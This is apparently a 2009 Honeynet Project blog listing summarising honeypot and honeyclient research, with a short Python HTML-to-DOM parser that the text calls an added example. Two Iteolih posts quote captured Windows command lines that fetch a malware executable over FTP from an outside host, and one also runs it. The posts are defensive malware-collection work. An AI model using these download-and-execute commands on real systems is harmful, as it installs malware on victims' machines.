Iteolih: malicious ftp services

26 Jul 2009 Markus Koetter iteolih

Yesterday, I got an incomplete, but successful, attack on my honeypot. The attacker's remote code execution looked like this:

WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
ExitThread(0)

As the part required to actually download the malware to the remote host was missing, I got curious and wanted a copy.

I did not expect downloading the malware to be a problem, as all the required information was available, including host, credentials and filename. But as the ftp service embedded in the malware is rather special, it was a problem.
The ftp service is designed to work with the Windows ftp client. The Windows ftp client only supports active ftp, and active ftp does not work behind NAT if the ftp service is not listening on the default port 21. Apart from that, the ftp service may fail on about 6% of all ports.

Spanish Chapter Status Report For 2008

24 Jul 2009 Diego Gonzalez Gomez report

ORGANIZATION

The Spanish Honeynet Project chapter's primary areas of interest and development are wireless honeynets, web honeypots, data collection and analysis, and researching technical papers to inform the community. Our current members are:

  • Diego González, chapter lead, Telecommunications Engineer and IT Security Professional.
  • Javier Fernández-Sanguino Peña, PhD in Telecommunications Engineering and project leader in Germinus XXI S.A.
  • Raúl Siles, Masters degree in Computer Science, GSE and senior independent Security Consultant.
  • Carlos Fragoso Mariscal, networking, systems and security engineer for Supercomputing Center of Catalonia.

Our chapter has a new member, Pedro Sánchez, security administrator of “Asociación Técnica de Cajas de Ahorros”, CISM and CHFI.

Glastopf's new vulnerability emulator

22 Jul 2009 Lukas Rist glastopf parser webhoneypot

The number of attacks the Webhoneypot receives depends strongly on its PHP parser, so keeping the pattern matching mechanism up to date was one of the major items of future work. One of my goals for the Google Summer of Code period is to improve the parser and to make it less dependent on upcoming changes in attack patterns. The old parser was very simple: collect all lines containing echo calls, look for known patterns and generate the appropriate response.

Iteolih: If you can't touch it ...

21 Jul 2009 Markus Koetter ftp iteolih

While playing with the current hsoc code, I got attacked and saw an offer to download something from somewhere:
cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe
The offer to download something was not that unexpected; we are working hard to get these offers so we can grab copies of something. But the location was interesting. Obviously they decided to go for a central service to deploy their malware, and to indicate that level of professionalism at first sight, they use(d) a domain.

Visualization Experiments

14 Jul 2009 Kevin Galloway

Most of my work in the past few weeks has been focusing on the visualization aspect of the project. One thing that I am trying to avoid is simply making graphs/charts and that sort of visualization. Those sorts of things are incredibly useful since anyone can understand them; on the other hand they're trivial to make. I've been making a few basic visualizations, but the two that, so far, have the most merit are delineating the events based on color (each group of events is a separate color) and separating them based on height (each y position is a different event). I'll admit that these are very rudimentary, but I think they get the idea across. Each attached picture is broken into two visualizations: the top is based on color, the bottom on position. One picture also experiments with size: if there are similar groups near one event, that node on the graph gets wider. It's pretty basic at the moment: if there is a match for a group in the current event and the one ahead of it, then it gets wider. Since I only have one data source in my test data (one IP address) there's only one band, but with more data sources, more bands would appear, so one could compare and contrast data between different machines. Grey nodes in both graphs are any data that doesn't match a group; basically I was trying to pick a neutral color that doesn't pop out when a user looks at the graph. Ungrouped data isn't particularly interesting, aside from trying to see if an absence of something indicates a trend.

A review to what we have done yet

13 Jul 2009 Geng Wang project

Our work mainly focuses on DOM simulation. I believe the following is the most important part for deobfuscation, but we also do a lot more so that our program can handle normal web pages; we will not list that here.

Our code can be found at:

http://code.google.com/p/phoneyc/source/browse/phoneyc#phoneyc/branches/phoneyc_wanggeng

1. DOM tree generation.

We defined a class 'DOMObject' in Python; it has a list 'children' as a member. We use SGMLParser to parse the HTML document and create a DOMObject whenever a start tag is encountered. The resulting DOM tree can be output for further analysis.
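The following is an added example (not code from the phoneyc branch) of the tree-building approach described above. It assumes Python 3, so it uses html.parser.HTMLParser instead of SGMLParser (which was removed in Python 3); the class name DOMObject comes from the post, but the implementation, the helper names (build_dom, find_all, dump) and the embedded sample document are my own. The end-tag handler walks up to the nearest open element with the same tag, so badly nested or unclosed tags, common in obfuscated pages, still yield a usable tree.

```python
from html.parser import HTMLParser

# Elements that never get a closing tag; they must not become the "current" node.
VOID_TAGS = {"br", "img", "meta", "link", "input", "hr", "area", "base", "col"}


class DOMObject:
    """One node of the simulated DOM: tag name, attributes, parent, children, text."""

    def __init__(self, tag, attrs=None, parent=None):
        self.tag = tag
        self.attrs = dict(attrs or [])
        self.parent = parent
        self.children = []   # the 'children' list named in the post
        self.text = ""       # concatenated character data directly inside this node

    def dump(self, depth=0):
        """Return an indented textual outline of the subtree for further analysis."""
        lines = ["  " * depth + "<%s>" % self.tag]
        for child in self.children:
            lines.extend(child.dump(depth + 1))
        return lines


class DOMTreeBuilder(HTMLParser):
    """Creates a DOMObject for every start tag and links it under the open element."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.root = DOMObject("#document")
        self.current = self.root

    def handle_starttag(self, tag, attrs):
        node = DOMObject(tag, attrs, parent=self.current)
        self.current.children.append(node)
        if tag not in VOID_TAGS:
            self.current = node

    def handle_startendtag(self, tag, attrs):
        # <tag ... /> opens and closes in one step
        self.current.children.append(DOMObject(tag, attrs, parent=self.current))

    def handle_endtag(self, tag):
        # Tolerate unclosed children: climb to the nearest open element with this tag.
        node = self.current
        while node is not self.root and node.tag != tag:
            node = node.parent
        if node is not self.root:
            self.current = node.parent

    def handle_data(self, data):
        # script/style bodies also arrive here, which is what a deobfuscator wants
        self.current.text += data


def build_dom(html):
    """Parse an HTML string and return the root DOMObject."""
    builder = DOMTreeBuilder()
    builder.feed(html)
    builder.close()
    return builder.root


def find_all(node, tag):
    """Depth-first search for every descendant with the given tag name."""
    found = []
    for child in node.children:
        if child.tag == tag:
            found.append(child)
        found.extend(find_all(child, tag))
    return found


# Constructed sample page: a void <br>, an inline script, and an unclosed <p>.
SAMPLE_HTML = """<html><head><title>t</title></head>
<body><div id="a"><p>hello<br>world</p><script>var x=1;</script></div>
<img src="x.gif"><div>unclosed<p>para</div></body></html>"""

if __name__ == "__main__":
    root = build_dom(SAMPLE_HTML)
    print("\n".join(root.dump()))
    for script in find_all(root, "script"):
        print("script body:", script.text)
```

The script bodies collected this way are the natural input for the deobfuscation stage, since the parser sees them as plain character data rather than as markup.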

Iteolih: SMB/RPC efforts

11 Jul 2009 Mark Schloesser iteolih samba dcerpc python

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).

SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.

What we basically want to achieve is having a stable base for registering certain known-to-be vulnerable RPC calls in modules to detect exploits and thus be able to collect malware. This way one can easily write a new module if a new patch or exploit gets released for yet another vulnerability without going through the hassle of implementing all SMB message types in each module. In the past we had to manually implement each one in a C++ module for the nepenthes honeypot.

Conficker.A going down?

10 Jul 2009 Tillmann Werner conficker

Conficker contains a piece of code that has been the object of speculation: it does not infect boxes located in Ukraine. Before sending an exploit, it performs a lookup against Maxmind's GeoIP database, which is freely available, and skips the host if the returned country code is UA. While the B variant comes with a copy of the database embedded, the A variant downloads the file from Maxmind's server. A couple of days ago Felix had the idea to deliver a specially crafted database that maps every IP address to Ukraine. The database format is actually quite simple, and he managed to create a valid database that places the whole Internet around Kiev.

What's new on phoneyc (3)--- Mid-term Evaluation

05 Jul 2009 Zhijie Chen gsoc libemu phoneyc shellcode spidermonkey

Mid-term Report on PHoneyC GSoC project 1

Info: See https://www.honeynet.org/gsoc/project1 for project details.
Author: Zhijie Chen (Joyan) [email protected]
Mentor: Jose Nazario
Description: Mid-term Report on PHoneyC GSoC project 1. This report describes what I have done on the PHoneyC's libemu integration for shellcode and heapspray detection during the first half of the GSoC. Till now, the main ideas on this feature have been fast-implemented (actually I mean poor coding style) and the whole flow works well, with some code rewriting and performance optimization needed in the future.

Introduction

PHoneyC is a low-interaction honeyclient written by Jose Nazario. The shellcode (SC for short) and heapspray (HS for short) detection module for PHoneyC is listed on the GSoC this year and I feel lucky to be chosen to implement it. This report is the main idea about how to detect SC/HS in PHoneyC and how to build and run this version of PHoneyC. Note that this module (I call it honeyjs) is far from complete currently and this report is only for midterm evaluation. So it is possible that the way to build and run it won't work in the future.

Tracking Intelligence Project

03 Jul 2009 Angelo Dellaera

What is TIP? TIP stands for Tracking Intelligence Project. In my most beautiful dreams, TIP should be an information gathering framework whose purpose is to autonomously collect Internet threat trends. It's entirely written in Python using Twisted and bound to the Django framework in order to abstract the underlying database and to easily build a web interface to the data.

TIP is made up of a few modules which are totally independent of one another, but with each one feeding the others. Its design is based on a core module which acts as a kind of scheduler, scheduling what we can call "first level modules" either at a precise time in the future or in response to a particular event.